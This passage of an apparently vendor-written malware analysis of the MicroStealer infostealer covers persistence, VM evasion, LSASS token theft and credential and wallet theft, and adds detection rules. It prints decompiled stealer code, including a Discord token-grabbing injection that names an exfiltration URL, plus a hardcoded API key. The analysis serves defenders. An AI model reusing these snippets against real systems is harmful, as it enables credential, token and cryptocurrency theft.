Let us look at its modules in more detail:<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Persistence<\/h3>\n\n\n\n<p>Persistence is implemented through the <strong>Windows Task Scheduler<\/strong>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">private void a() throws InterruptedException, IOException { \n    String string = System.getenv(\"LOCALAPPDATA\"); \n    \/\/ decompiler output: the LOCALAPPDATA value is discarded and rebuilt from user.home \n    string = System.getProperty(\"user.home\") + \"\\\\AppData\\\\Local\"; \n    String string2 = string + \"\\\\model\\\\jre\\\\bin\\\\miicrosoft.exe\"; \n    String string3 = string + \"\\\\soft.jar\"; \n    String string4 = System.getProperty(\"user.name\"); \n    String string5 = \"App_\" + string4; \n    String string6 = String.format(\"schtasks \/create \/tn \\\"%s\\\" \/tr \\\"\\\\\\\"%s\\\\\\\" -jar \\\\\\\"%s\\\\\\\"\\\" \/sc ONLOGON \/delay 0000:05 \/rl HIGHEST \/f\", string5, string2, string3); \n    Process process = Runtime.getRuntime().exec(string6); \n    process.waitFor(); \n} <\/code><\/pre>\n\n\n\n<p>The command registers a task named <strong>App_&lt;username&gt;<\/strong> in <strong>Windows Task Scheduler<\/strong> with the <strong>ONLOGON trigger<\/strong> (it fires when the user logs in), a <strong>5-second delay<\/strong> (the \/delay value is in mmmm:ss form), and the <strong>highest run level (\/rl HIGHEST)<\/strong>. As a result, the malware resumes automatically after a reboot. Two details help with hunting: the task name follows a fixed pattern, and the task action is a <strong>-jar<\/strong> launch of a binary named miicrosoft.exe under %LOCALAPPDATA%\\model\\jre\\bin, which is rare for legitimate software. Registering a task with \/rl HIGHEST that really runs elevated requires the creating process itself to be elevated, which is one reason the earlier UAC prompt matters.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Virtual Machine Detection<\/h3>\n\n\n\n<p>MicroStealer checks the execution environment for processes and services typically associated with <strong>virtual machines<\/strong>. 
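<\/p>\n\n\n\n<p>The persistence command above, together with the launch chain from the Node.js section (an Electron launcher spawning PowerShell with -ExecutionPolicy Bypass, and a Java runtime renamed miicrosoft.exe running soft.jar from %LOCALAPPDATA%), gives three host-level patterns worth hunting for. The block below is an added example, not part of the original analysis: it runs those three checks over constructed, Sysmon-style process-creation events (Image, ParentImage, CommandLine, OriginalFileName). The user name, the task name App_u, the script name elevate.ps1 and the Electron install directory are assumptions made up for the sample data, not values taken from the malware.<\/p>

```javascript
'use strict';
// Added example (not MicroStealer code): hunt for three host-level patterns
// described in this post in process-creation telemetry.
// ASSUMPTIONS: SAMPLE_EVENTS is constructed, Sysmon-style data (Event ID 1
// field names); the user name, task name, script name and the Electron
// install directory are invented for the sample, not taken from the malware.

const SAMPLE_EVENTS = [
  { // Electron launcher spawning the elevation helper (page strings [35-41])
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    originalFileName: 'PowerShell.EXE',
    parentImage: 'C:\\Users\\u\\AppData\\Local\\Programs\\Game Launcher\\Game Launcher.exe',
    commandLine: 'powershell -ExecutionPolicy Bypass -NoProfile -NonInteractive -File "C:\\Users\\u\\AppData\\Local\\Temp\\elevate.ps1"',
  },
  { // renamed JRE launching the JAR payload
    image: 'C:\\Users\\u\\AppData\\Local\\model\\jre\\bin\\miicrosoft.exe',
    originalFileName: 'java.exe',
    parentImage: 'C:\\Users\\u\\AppData\\Local\\Programs\\Game Launcher\\Game Launcher.exe',
    commandLine: '"C:\\Users\\u\\AppData\\Local\\model\\jre\\bin\\miicrosoft.exe" -jar "C:\\Users\\u\\AppData\\Local\\soft.jar"',
  },
  { // the persistence task, shaped like the String.format call above
    image: 'C:\\Windows\\System32\\schtasks.exe',
    originalFileName: 'schtasks.exe',
    parentImage: 'C:\\Users\\u\\AppData\\Local\\model\\jre\\bin\\miicrosoft.exe',
    commandLine: 'schtasks /create /tn "App_u" /tr "\\"C:\\Users\\u\\AppData\\Local\\model\\jre\\bin\\miicrosoft.exe\\" -jar \\"C:\\Users\\u\\AppData\\Local\\soft.jar\\"" /sc ONLOGON /delay 0000:05 /rl HIGHEST /f',
  },
  { // benign: a normally named JRE running a vendor JAR from Program Files
    image: 'C:\\Program Files\\Java\\jre\\bin\\java.exe',
    originalFileName: 'java.exe',
    parentImage: 'C:\\Windows\\explorer.exe',
    commandLine: '"C:\\Program Files\\Java\\jre\\bin\\java.exe" -jar "C:\\Program Files\\SomeVendor\\app.jar"',
  },
  { // benign: an administrator creating a daily task
    image: 'C:\\Windows\\System32\\schtasks.exe',
    originalFileName: 'schtasks.exe',
    parentImage: 'C:\\Windows\\System32\\cmd.exe',
    commandLine: 'schtasks /create /tn "NightlyBackup" /tr "C:\\Program Files\\Backup\\agent.exe /run" /sc DAILY /st 02:00',
  },
];

const basename = (p) => p.slice(p.lastIndexOf('\\') + 1).toLowerCase();

// Extract the /tr value from a schtasks command line, honouring the \"
// escapes that the malware's String.format call produces.
function parseTaskRun(cmd) {
  const m = /\/tr\s+/i.exec(cmd);
  if (!m) return null;
  let i = m.index + m[0].length;
  if (cmd[i] !== '"') {
    const end = cmd.indexOf(' ', i);
    return end < 0 ? cmd.slice(i) : cmd.slice(i, end);
  }
  let out = '';
  for (i += 1; i < cmd.length; i += 1) {
    if (cmd[i] === '\\' && cmd[i + 1] === '"') { out += '"'; i += 1; continue; }
    if (cmd[i] === '"') break;
    out += cmd[i];
  }
  return out;
}

// Rule 1: a Java runtime whose on-disk name is not java.exe / javaw.exe.
function renamedJavaRuntime(ev) {
  return (ev.originalFileName || '').toLowerCase() === 'java.exe'
    && !['java.exe', 'javaw.exe'].includes(basename(ev.image));
}

// Rule 2: a logon task at highest run level whose action is a -jar launch
// from a user-writable directory.
function onLogonJarTask(ev) {
  if (basename(ev.image) !== 'schtasks.exe' || !/\/create\b/i.test(ev.commandLine)) return false;
  const run = parseTaskRun(ev.commandLine) || '';
  return /\/sc\s+onlogon\b/i.test(ev.commandLine)
    && /\/rl\s+highest\b/i.test(ev.commandLine)
    && /\\appdata\\local\\/i.test(run)
    && /\s-jar\s/i.test(run);
}

// Rule 3: PowerShell with policy bypass running a script file, parented by
// an executable under the user's profile (the Electron launcher here).
function bypassScriptFromUserDir(ev) {
  const cl = ev.commandLine.toLowerCase();
  return basename(ev.image) === 'powershell.exe'
    && ['-executionpolicy bypass', '-noprofile', '-noninteractive', '-file'].every((f) => cl.includes(f))
    && /\\users\\[^\\]+\\appdata\\local\\/i.test(ev.parentImage);
}

const RULES = [
  ['renamed_java_runtime', renamedJavaRuntime],
  ['onlogon_highest_jar_task', onLogonJarTask],
  ['bypass_script_from_user_dir', bypassScriptFromUserDir],
];

function hunt(events) {
  const hits = [];
  events.forEach((ev, index) => {
    for (const [rule, test] of RULES) {
      if (test(ev)) hits.push({ index, rule, image: ev.image });
    }
  });
  return hits;
}

console.log(hunt(SAMPLE_EVENTS));
```

<p>The OriginalFileName check is the most durable of the three: Sysmon reads it from the PE version resource, which renaming does not change, so a process whose image name differs from its original file name java.exe stands out regardless of the directory it runs from. The \/tr parser honours the escaped inner quotes that the Java code builds, which a plain split on spaces would not.<\/p>\n\n\n\n<p>Back to the anti-analysis logic, which compares the names of running processes and services against a hard-coded list. 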
If at least one match is found, execution is terminated immediately. The list covers only guest-tool components (VMware Tools, Virtual PC, VirtualBox Guest Additions, the QEMU guest agent, Xen and Parallels services), so a virtualized environment that does not run those agents passes the check unchanged.<\/p>\n\n\n\n<p>Despite these anti-analysis checks, the sample executes successfully in the <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN sandbox<\/strong><\/a>, allowing its behavior to be fully exposed during analysis. This makes it possible to observe the malware\u2019s logic in action and extract <strong>IOCs<\/strong> for further detection and threat hunting.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">private static void checkEnvironment(String str) throws Exception { \n    String&#091;] strArr = new String&#091;13]; \n    strArr&#091;0]  = \"vmwaretray\"; \n    strArr&#091;1]  = \"vmwareuser\"; \n    strArr&#091;2]  = \"vgauthservice\"; \n    strArr&#091;3]  = \"vmacthlp\"; \n    strArr&#091;4]  = \"vmsrvc\"; \n    strArr&#091;5]  = \"vmusrvc\"; \n    strArr&#091;6]  = \"vmtoolsd\"; \n    strArr&#091;7]  = \"vboxservice\"; \n    strArr&#091;8]  = \"vboxtray\"; \n    strArr&#091;9]  = \"qemu-ga\"; \n    strArr&#091;10] = \"xenservice\"; \n    strArr&#091;11] = \"prl_cc\"; \n    strArr&#091;12] = \"prl_tools\"; \n \n    boolean anyMatch = Arrays.asList(strArr) \n        .stream() \n        .anyMatch(v1 -> str.toLowerCase().contains(v1)); \n \n    if (anyMatch) { \n        Runtime.getRuntime().halt(0); \n    } \n} <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Browser Data Theft<\/h3>\n\n\n\n<p>MicroStealer supports a wide range of <strong>Chromium-based browsers<\/strong>, as well as <strong>Opera<\/strong> and <strong>Opera GX<\/strong>. 
For each detected browser, it locates the profile directory and decrypts the protected data with <strong>Windows DPAPI<\/strong>. Chromium keeps the key that protects its Login Data and Cookies databases in the browser\u2019s Local State file, wrapped with DPAPI; DPAPI unwraps it only for the same Windows user, which is why decryption has to happen on the victim\u2019s machine in the victim\u2019s user context. Current Chrome builds add App-Bound Encryption on top, whose key can only be unwrapped directly from a SYSTEM context; that is one plausible reason for the SYSTEM-token impersonation described in the next section.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>put(\"Chrome\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Google\\\\Chrome\\\\User&nbsp;Data\");&nbsp;\nput(\"Brave\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\BraveSoftware\\\\Brave-Browser\\\\User&nbsp;Data\");&nbsp;\nput(\"Edge\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Microsoft\\\\Edge\\\\User&nbsp;Data\");&nbsp;\nput(\"Vivaldi\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Vivaldi\\\\User&nbsp;Data\");&nbsp;\nput(\"Yandex\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Yandex\\\\YandexBrowser\\\\User&nbsp;Data\");&nbsp;\nput(\"Chromium\",&nbsp;localAppData&nbsp;+&nbsp;\"\\\\Chromium\\\\User&nbsp;Data\");&nbsp;\n<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\nput(\"Opera\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Opera&nbsp;Software\\\\Opera Stable\");&nbsp;\nput(\"Opera GX\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Opera&nbsp;Software\\\\Opera GX Stable\");&nbsp;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Interaction with LSASS<\/h3>\n\n\n\n<p>When <strong>LSA protection<\/strong> is disabled (<strong>RunAsPPL = 0<\/strong>), the malware moves from an administrator context to SYSTEM by borrowing the token of the <strong>lsass.exe<\/strong> process. It enables <strong>SeDebugPrivilege<\/strong> (which already requires an elevated administrator process), locates <strong>LSASS<\/strong> in a Toolhelp snapshot, opens its token, duplicates it as an impersonation token and impersonates it on the current thread, after which that thread runs as SYSTEM. The registry check is not optional: with RunAsPPL set, a non-protected process is refused the access to lsass.exe that OpenProcessToken needs, so the token cannot be obtained this way:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">Advapi32Util.registryGetIntValue(HKEY_LOCAL_MACHINE,  \n    \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\", \"RunAsPPL\"); \n \naf.INSTANCE.RtlAdjustPrivilege(SeDebugPrivilege, true, false, intByReference); \n \nWinNT.HANDLE snapshot = Kernel32.INSTANCE.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); \nwhile (Kernel32.INSTANCE.Process32Next(snapshot, processEntry)) { \n    if (\"lsass.exe\".equalsIgnoreCase(Native.toString(processEntry.szExeFile))) { \n        HANDLE hProcess = Kernel32.INSTANCE.OpenProcess(PROCESS_QUERY_INFORMATION, false, processEntry.th32ProcessID); \n         \n        Advapi32.INSTANCE.OpenProcessToken(hProcess, TOKEN_DUPLICATE, tokenHandle); \n        Advapi32.INSTANCE.DuplicateToken(tokenHandle.getValue(), SecurityImpersonation, duplicatedToken); \n        Advapi32.INSTANCE.ImpersonateLoggedOnUser(duplicatedToken.getValue()); \n        break; \n    } \n} <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Screen Capture<\/h3>\n\n\n\n<p>The malware captures the user\u2019s current screen using <strong>java.awt.Robot<\/strong>. 
The resulting image is saved in <strong>PNG format<\/strong> and then packaged into a <strong>ZIP archive<\/strong> for later exfiltration. Note that Toolkit.getDefaultToolkit().getScreenSize() reports the primary display only, so on multi-monitor systems secondary screens are not captured.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">Robot robot = new Robot(); \nRectangle screen = new Rectangle(Toolkit.getDefaultToolkit().getScreenSize()); \nBufferedImage screenshot = robot.createScreenCapture(screen); \nImageIO.write(screenshot, \"png\", new File(\"screenshot.png\")); <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Additional MicroStealer Functionality<\/h3>\n\n\n\n<p>MicroStealer targets both <strong>browser-based cryptocurrency wallet extensions<\/strong> (via <strong>Local Extension Settings<\/strong>, keyed by the extension\u2019s store ID and resolved relative to each browser profile) and <strong>desktop wallet applications<\/strong>. The wallet files are copied in full, without any additional processing.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>put(\"Metamask\",&nbsp;\"\\\\Local&nbsp;Extension Settings\\\\nkbihfbeogaeaoehlefnkodbefgpgknn\");&nbsp;\nput(\"Phantom\",&nbsp;\"\\\\Local&nbsp;Extension Settings\\\\bfnaelmomeimhlpmgjnjophhpkkoljpa\");&nbsp;\nput(\"Trust Wallet\",&nbsp;\"\\\\Local&nbsp;Extension Settings\\\\egjidjbpglichdcondbcbdnbeeppgdph\");&nbsp;\nput(\"Coinbase\",&nbsp;\"\\\\Local&nbsp;Extension Settings\\\\hnfanknocfeofbddgcijnmhnfnkdnaad\");&nbsp;\n<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\nput(\"Exodus\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Exodus\\\\exodus.wallet\");&nbsp;\nput(\"Electrum\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Electrum\\\\wallets\");&nbsp;\nput(\"AtomicWallet\",&nbsp;appData&nbsp;+&nbsp;\"\\\\atomic\\\\Local&nbsp;Storage\\\\leveldb\");&nbsp;\nput(\"Ethereum\",&nbsp;appData&nbsp;+&nbsp;\"\\\\Ethereum\\\\keystore\");&nbsp;\nput(\"Jaxx\",&nbsp;appData&nbsp;+&nbsp;\"\\\\com.liberty.jaxx\\\\IndexedDB\\\\file__0.indexeddb.leveldb\");&nbsp;\n<em>\/\/ ...<\/em>&nbsp;<\/code><\/pre>\n\n\n\n<p>JavaScript code is injected into the <strong>Discord desktop application<\/strong>, using <strong>Webpack Chunk 
Injection<\/strong>&nbsp;to access internal client modules and the&nbsp;<strong>Chrome DevTools Protocol (CDP)<\/strong>&nbsp;to intercept network&nbsp;requests and monitor user activity.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>const<\/strong>&nbsp;{ session,&nbsp;BrowserWindow&nbsp;}&nbsp;=&nbsp;require('electron');&nbsp;\n<strong>const<\/strong>&nbsp;C&nbsp;=&nbsp;{&nbsp;webhook:&nbsp;{&nbsp;url:&nbsp;'https:\/\/78smp.com\/m\/'&nbsp;} };&nbsp;\n&nbsp;\n<em>\/\/ token extraction from webpack<\/em>&nbsp;\nwindow.webpackChunkdiscord_app.push(&#091;&nbsp;\n&nbsp;&nbsp;&nbsp; &#091;Math.random()],&nbsp;{},&nbsp;\n&nbsp;&nbsp;&nbsp; (r)&nbsp;<strong>=&gt;<\/strong>&nbsp;{&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>for<\/strong>&nbsp;(<strong>const<\/strong>&nbsp;mid&nbsp;<strong>in<\/strong>&nbsp;r.c) {&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;getToken&nbsp;=&nbsp;r.c&#091;mid]?.exports?.default?.getToken;&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>if<\/strong>&nbsp;(<strong>typeof<\/strong>&nbsp;getToken&nbsp;===&nbsp;'function')&nbsp;<strong>return<\/strong>&nbsp;getToken();&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }&nbsp;\n&nbsp;&nbsp;&nbsp; }&nbsp;\n]);&nbsp;\n&nbsp;\n<em>\/\/ CDP-based network interception<\/em>&nbsp;\nw.webContents.debugger.attach('1.3');&nbsp;\nw.webContents.debugger.on('message',&nbsp;<strong>async<\/strong>&nbsp;(_,&nbsp;m,&nbsp;p)&nbsp;<strong>=&gt;<\/strong>&nbsp;{&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ \/auth\/login, \/mfa\/totp, \/users\/@me<\/em>&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ exfiltration to Discord webhook<\/em>&nbsp;\n});&nbsp;<\/code><\/pre>\n\n\n\n<p>The malware intercepts events related to <strong>logins, credential changes, 2FA enablement, and the addition of payment methods<\/strong> such as Stripe and Braintree\/PayPal. 
In addition, it collects account metadata such as badges, Nitro level, and similar attributes, which may indicate an attempt to profile victims.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Steam Account Profiling&nbsp;<\/h3>\n\n\n\n<p>The malware&nbsp;also collects information about the victim\u2019s&nbsp;<strong>Steam account<\/strong>. Using&nbsp;a&nbsp;hardcoded API key, the stealer queries the&nbsp;Steam Web API&nbsp;to&nbsp;retrieve the&nbsp;profile level, number of owned games, and account creation date.&nbsp;<\/p>\n\n\n\n<p>While this information does not provide direct access to the account on its own, it may be used to assess the victim\u2019s value and prioritize targets, similarly to the profiling observed in Discord.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">String&nbsp;apiKey&nbsp;=&nbsp;\"440D7F4D810EF9298D25EDDF37C1F902\";&nbsp;\n&nbsp;\nString&nbsp;levelUrl&nbsp;=&nbsp;String.format(&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;\"https:\/\/api.steampowered.com\/IPlayerService\/GetSteamLevel\/v1\/?key=%s&amp;steamid=%s\",&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;apiKey,&nbsp;steamId&nbsp;\n);&nbsp;\n&nbsp;\nString&nbsp;gamesUrl&nbsp;=&nbsp;String.format(&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;\"https:\/\/api.steampowered.com\/IPlayerService\/GetOwnedGames\/v1\/?key=%s&amp;steamid=%s\",&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;apiKey,&nbsp;steamId&nbsp;\n);&nbsp;\n&nbsp;\nString&nbsp;summaryUrl&nbsp;=&nbsp;String.format(&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;\"https:\/\/api.steampowered.com\/ISteamUser\/GetPlayerSummaries\/v0002\/?key=%s&amp;steamids=%s\",&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;apiKey,&nbsp;steamId&nbsp;\n);&nbsp;<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Detecting&nbsp;MicroStealer&nbsp;Early: A Practical Investigation&nbsp;Loop&nbsp;<\/h2>\n\n\n\n<p>MicroStealer highlights a familiar problem for many security teams: new malware families often appear before reliable signatures or threat intelligence become widely available.<\/p>\n\n\n\n<p>When 
that happens, defenders are&nbsp;left with suspicious files, unclear alerts, and limited external context. Without fast verification, attackers can quietly collect credentials, session tokens, and other sensitive data while investigations stall.&nbsp;<\/p>\n\n\n\n<p>Early detection depends on how quickly a team can move from&nbsp;<strong>uncertain signals to confirmed malicious behavior<\/strong>.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1. Monitoring: Spot Suspicious Infrastructure&nbsp;Early&nbsp;<\/h3>\n\n\n\n<p>Infostealers often rely on external services and fresh infrastructure for data exfiltration. In the case of MicroStealer, stolen information is transmitted through <strong>Discord webhooks and attacker-controlled servers<\/strong>.<\/p>\n\n\n\n<p>Monitoring for newly observed infrastructure&nbsp;and suspicious connections can help teams catch early signs of compromise before&nbsp;the malware&nbsp;fully completes its collection and exfiltration stages.&nbsp;<\/p>\n\n\n\n<p>ANY.RUN\u2019s&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Threat Intelligence&nbsp;Feeds<\/strong><\/a>&nbsp;continuously&nbsp;surface&nbsp;newly observed indicators based on telemetry and submissions from&nbsp;<strong>15,000+ organizations and 600,000+ security professionals<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"466\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-1024x466.png\" alt=\"\" class=\"wp-image-18796\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-1024x466.png 1024w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-300x136.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-768x349.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-370x168.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-270x123.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3-740x337.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/monitoring_feeds3.png 1425w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>100% actionable IOCs delivered by TI Feeds to your existing stack<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>For SOC teams, this means fewer blind spots in monitoring and earlier visibility into suspicious domains, IPs, and attacker infrastructure.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">2. Triage: Confirm Behavior Instead of Guessing<\/h3>\n\n\n\n<p>New malware families like MicroStealer often lack <strong>clear static signatures or reliable reputation data<\/strong>, which slows down traditional investigation workflows.<\/p>\n\n\n\n<p>Instead of relying only on static verdicts, analysts can quickly confirm what a suspicious file actually does by executing it in a controlled environment.<\/p>\n\n\n\n<p>Running the sample in the <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN interactive sandbox<\/a> reveals the full execution chain, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>NSIS installer delivering the payload<\/li>\n\n\n\n<li>Electron loader extracting the JAR module<\/li>\n\n\n\n<li>Java stealer executing its data collection logic<\/li>\n\n\n\n<li>Attempts to steal browser credentials and wallet data<\/li>\n\n\n\n<li>Communication with Discord webhooks and external servers<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"737\" 
src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-1024x737.png\" alt=\"\" class=\"wp-image-19138\" style=\"width:568px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-1024x737.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-300x216.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-768x553.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-370x266.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-270x194.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33-740x533.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-12-at-09.57.33.png 1536w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Relevant IOCs automatically gathered in one tab inside ANY.RUN sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Within minutes, analysts can observe the <strong>complete attack chain<\/strong>, extract <strong>reliable IOCs<\/strong>, and determine whether the sample poses a real threat.<\/p>\n\n\n\n<p>For SOC teams, this replaces guesswork with <strong>behavior-based evidence<\/strong>, helping reduce investigation time and avoid unnecessary escalations.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3. 
Threat Hunting: Expand Detection from One Sample&nbsp;<\/h3>\n\n\n\n<p>Once a stealer like&nbsp;MicroStealer&nbsp;is confirmed, the next step is ensuring it&nbsp;<strong>does not appear elsewhere&nbsp;in the environment<\/strong>.&nbsp;<\/p>\n\n\n\n<p>Using&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Threat Intelligence&nbsp;Lookup<\/strong><\/a>, analysts can pivot from the&nbsp;initial&nbsp;indicators to discover&nbsp;related infrastructure, connected samples, and similar activity patterns.&nbsp;<\/p>\n\n\n\n<p>This allows teams to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>identify&nbsp;related domains and IP addresses&nbsp;<\/li>\n\n\n\n<li>find&nbsp;other samples using the same infrastructure&nbsp;<\/li>\n\n\n\n<li>detect&nbsp;variants using the same delivery chain&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22microstealer%5C%22%22,%22dateRange%22:180}\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>threatName:&#8221;microstealer&#8221;<\/strong><\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"565\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1024x565.png\" alt=\"ANY.RUN\u00a0TI\u00a0Lookup\u00a0demonstrates\u00a0relevant sandbox sessions with MicroStealer\u00a0\" class=\"wp-image-19100\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1024x565.png 1024w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-300x165.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-768x423.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1536x847.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-2048x1129.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-370x204.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-270x149.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-740x408.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN&nbsp;TI&nbsp;Lookup&nbsp;demonstrates&nbsp;relevant sandbox sessions with MicroStealer<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>By pivoting across infrastructure&nbsp;and behavior, organizations can transform a single investigation into&nbsp;<strong>broader detection coverage across the environment<\/strong>.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion: Faster Clarity Means Lower Risk&nbsp;<\/h2>\n\n\n\n<p>MicroStealer&nbsp;demonstrates how modern infostealers combine&nbsp;layered delivery chains, heavy obfuscation, and anti-analysis techniques&nbsp;to slow down detection.&nbsp;<\/p>\n\n\n\n<p>However, even complex malware&nbsp;becomes manageable when teams can quickly move from&nbsp;uncertain alerts to clear behavioral evidence.&nbsp;<\/p>\n\n\n\n<p>By combining&nbsp;<strong>early monitoring, fast behavioral triage, and targeted threat hunting<\/strong>, security teams can uncover emerging threats 